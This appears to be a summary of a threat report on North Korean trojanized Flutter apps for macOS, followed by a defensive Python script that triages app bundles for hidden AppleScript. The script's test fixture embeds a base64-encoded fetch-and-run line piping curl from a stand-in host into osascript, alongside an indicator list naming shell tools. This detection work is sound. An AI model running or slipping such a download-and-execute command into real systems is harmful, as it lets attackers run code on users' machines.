November 12, 2024 at 10:46AM
North Korean threat actors are targeting macOS systems with trojanized cryptocurrency-themed apps built using Flutter. The apps were signed and notarized, so they passed Apple's Gatekeeper checks. Discovered by Jamf Threat Labs, they connected to servers attributed to DPRK actors and could run AppleScript received from a command and control server. Apple has revoked their signatures, but the full extent of the operation is unclear.
### Meeting Takeaways:
1. **Targeting macOS:** North Korean threat actors have developed trojanized Notepad apps and Minesweeper games targeting macOS users, utilizing the Flutter framework.
2. **Legitimate Signing:** These malicious applications are signed and notarized with a legitimate Apple developer ID, allowing them to pass Apple's Gatekeeper checks and launch on macOS without the warnings an unsigned or un-notarized app would trigger.
3. **Focus on Cryptocurrency:** The application themes revolve around cryptocurrency, reflecting North Korea’s interest in financial theft.
4. **Research Insights:** Jamf Threat Labs identified this activity as more of an experimental approach to bypass macOS security rather than a highly targeted campaign.
5. **Connection to DPRK Servers:** Starting in November 2024, several apps were uploaded to VirusTotal that looked benign but connected to servers linked to North Korean actors and showed "stage one" functionality.
6. **Detection Challenges:** Flutter compiles the app's Dart code into a dynamic library (dylib) that is loaded at runtime, and that compiled Dart code is harder to analyze statically than native Objective-C or Swift, so malicious logic embedded in it is harder to detect.
7. **Malware Capabilities:** Analysis of specific applications revealed obfuscated code capable of executing AppleScript, allowing the apps to run commands received from a command and control (C2) server.
8. **Revocation of Signatures:** Apple has revoked the signatures of the identified malicious apps, so Gatekeeper now blocks them on macOS systems that receive the revocation.
9. **Operational Uncertainty:** It remains unclear whether these apps were used in actual cyber operations or were only experiments to test bypass techniques, as multiple variants of the applications were discovered.
10. **Further Investigation Required:** The specifics of this operation are not fully understood, indicating a need for ongoing monitoring and research into these types of threats.
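As an added example (not Jamf Threat Labs' tooling and not code from the original post), the following Python script does the static triage a responder could run against a suspect bundle. It checks for the standard Flutter macOS layout (assumed: Contents/Frameworks/App.framework/App for the compiled Dart code and Contents/Frameworks/FlutterMacOS.framework for the engine), then scans the Dart dylib for AppleScript and shell indicators in plain, byte-reversed and base64-decoded form, since the report describes the embedded script as obfuscated. The indicator list and the sample bundle it builds are constructed for this example.

```python
"""Static triage of a macOS app bundle for the Flutter/AppleScript pattern.

Added example, not Jamf Threat Labs tooling. Bundle layout follows the
standard Flutter macOS build (assumption). Indicator strings and the sample
bundle are constructed for this example.
"""
import base64
import os
import re
import tempfile

FLUTTER_APP_DYLIB = os.path.join("Contents", "Frameworks", "App.framework", "App")
FLUTTER_ENGINE = os.path.join("Contents", "Frameworks", "FlutterMacOS.framework")

# Strings a Dart snapshot has no normal reason to contain (assumed indicators).
INDICATORS = (b"osascript", b"do shell script", b"NSAppleScript", b"curl ")

# Runs of base64 alphabet long enough to hide a script rather than a token.
BASE64_BLOB = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def is_flutter_bundle(app_path):
    """True if the bundle carries both the Flutter engine and the Dart AOT dylib."""
    return (os.path.isfile(os.path.join(app_path, FLUTTER_APP_DYLIB))
            and os.path.isdir(os.path.join(app_path, FLUTTER_ENGINE)))


def _find_indicators(data):
    return sorted(ind.decode() for ind in INDICATORS if ind in data)


def scan_dart_snapshot(dylib_path):
    """Look for indicators in three views of the dylib: as-is, byte-reversed
    (a cheap obfuscation) and inside decoded base64 blobs."""
    with open(dylib_path, "rb") as f:
        data = f.read()
    findings = {
        "plain": _find_indicators(data),
        "reversed": _find_indicators(data[::-1]),
        "base64": [],
    }
    for match in BASE64_BLOB.finditer(data):
        try:
            decoded = base64.b64decode(match.group(), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        findings["base64"].extend(_find_indicators(decoded))
    findings["base64"] = sorted(set(findings["base64"]))
    return findings


def triage_bundle(app_path):
    """Return a verdict dict; a non-Flutter bundle is reported, not scanned."""
    if not is_flutter_bundle(app_path):
        return {"flutter": False, "suspicious": False, "findings": {}}
    findings = scan_dart_snapshot(os.path.join(app_path, FLUTTER_APP_DYLIB))
    return {"flutter": True,
            "suspicious": any(findings.values()),
            "findings": findings}


def build_sample_bundle(root):
    """Constructed fixture: a fake Flutter bundle whose Dart dylib carries a
    base64-encoded AppleScript one-liner and a reversed 'osascript' string."""
    app = os.path.join(root, "Sample.app")
    os.makedirs(os.path.join(app, FLUTTER_ENGINE))
    dylib = os.path.join(app, FLUTTER_APP_DYLIB)
    os.makedirs(os.path.dirname(dylib))
    script = b'do shell script "curl -s http://example.invalid/s | osascript"'
    payload = (b"\xcf\xfa\xed\xfe" + b"\x00" * 32      # fake Mach-O magic, padding
               + base64.b64encode(script) + b"\x00"
               + b"osascript"[::-1] + b"\x00")
    with open(dylib, "wb") as f:
        f.write(payload)
    return app


def run_sample():
    """Build the constructed bundle in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_bundle(build_sample_bundle(tmp))


if __name__ == "__main__":
    print(run_sample())
```

On a real system, call triage_bundle("/Applications/Suspect.app") and pair the result with `codesign -dv --verbose=4` and `spctl -a -vv` on the same bundle to read the Team ID and notarization status. A Flutter app with no hits is normal; any hit on a finance-themed app that has no business running AppleScript warrants dynamic analysis with network capture.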